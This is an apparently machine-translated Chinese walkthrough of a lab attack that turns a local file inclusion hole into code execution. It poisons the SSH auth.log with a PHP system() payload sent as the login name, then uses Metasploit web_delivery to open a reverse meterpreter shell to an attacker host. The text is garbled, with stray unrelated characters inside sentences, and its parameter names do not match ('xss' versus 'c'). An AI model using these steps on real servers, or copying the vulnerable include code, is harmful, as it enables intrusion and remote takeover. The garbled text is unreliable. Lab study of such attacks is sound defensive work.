在本文中,您將了解如何在auth日志文件的幫助下在Web服務(wù)器中進行未經(jīng)授權(quán)的訪問,如果它受到本地文件包含漏洞的影響。要執(zhí)行此攻擊請閱讀我們之前的文章“ 文件包含攻擊初學(xué)者指南(LFI / RFI)”,它將幫助您配置自己的Web服務(wù)器以及更多關(guān)于LFI漏洞肋乍。
目標、攻擊者:Kali Linux
讓我們開始7蟠妗墓造!
創(chuàng)建一個PHP文件,允許用戶通過file參數(shù)包含文件。因此觅闽,使用文件參數(shù)我們可以執(zhí)行包含惡意代碼的文件帝雇,以使未經(jīng)授權(quán)的訪問成為目標PC。
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("index.php");
}
?>
我將以下PHP代碼保存在文本文件中作為 lfi.php 并保存/var/www/html/谱煤。
因為我們在var/www/html/lfi中添加了一個包含include函數(shù)的php文件摊求,它允許通過它讀取另一個文件的內(nèi)容并導(dǎo)致LFI攻擊禽拔。讓我們通過瀏覽以下URL來讀取密碼文件來演示它:
localhost/lfi/lfi.php?file=/etc/passwd
從給定的圖像中刘离,您可以觀察到上面的URL已經(jīng)轉(zhuǎn)儲了如下所示的結(jié)果。
在kali Linux中打開終端并 通過SSH服務(wù)連接目標
ssh root@192.168.1.119
從屏幕截圖中您可以看到我與目標系統(tǒng)連接睹栖。
鍵入以下命令以查看其日志:
tail -f /var/log/auth.log
從下面給出的圖像中硫惕,您可以檢查auth.log文件的生成日志的詳細信息。
現(xiàn)在我將嘗試通過瀏覽器上的lfi.php打開auth.log日志文件野来,因此給予讀寫權(quán)限
cd /var/log/
chmod 775 auth.log
現(xiàn)在將auth.log文件包含為文件參數(shù)恼除,并在瀏覽器中提供以下URL。
192.168.1.119/lfi/lfi.php?file=/var/log/auth.log
從給定的圖像中曼氛,您可以看到它還在瀏覽器中顯示創(chuàng)建的auth日志豁辉。
由于auth.log文件在我們嘗試連接Web服務(wù)器時為每次成功和失敗的登錄嘗試生成日志。現(xiàn)在利用這個功能舀患,我將發(fā)送惡意PHP代碼 作為假用戶徽级,它將作為新日志自動添加到auth.log文件中。
ssh '<?php system($_GET['xss']); ?>'@192.168.1.119
再次當您檢查其日志時聊浅,您會發(fā)現(xiàn)PHP代碼已添加為新日志餐抢。
鍵入以下命令以查看其日志:
tail -f /var/log/auth.log
在這里它將轉(zhuǎn)儲auth日志的數(shù)據(jù)以及執(zhí)行通過cmd給出的注釋; 現(xiàn)在將 ifconfig 作為cmd注釋執(zhí)行以驗證網(wǎng)絡(luò)接口并從給定的屏幕截圖中確認其結(jié)果。
192.168.1.119/lfi/lfi.php?file=/var/log/auth.log &c=ifconfig
如果您在任何Web應(yīng)用程序中發(fā)現(xiàn)此類漏洞低匙,則可以使用metasploit平臺來利用Web服務(wù)器旷痕。
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.123
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
復(fù)制 下面窗口中顯示 的 突出顯示的文本
將上面 復(fù)制的惡意代碼粘貼到 URL中,如給定圖像所示顽冶,并將 其 作為命令執(zhí)行欺抗。
當上面的代碼執(zhí)行時,您將獲得目標Web服務(wù)器的meterpreter會話1强重。
msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo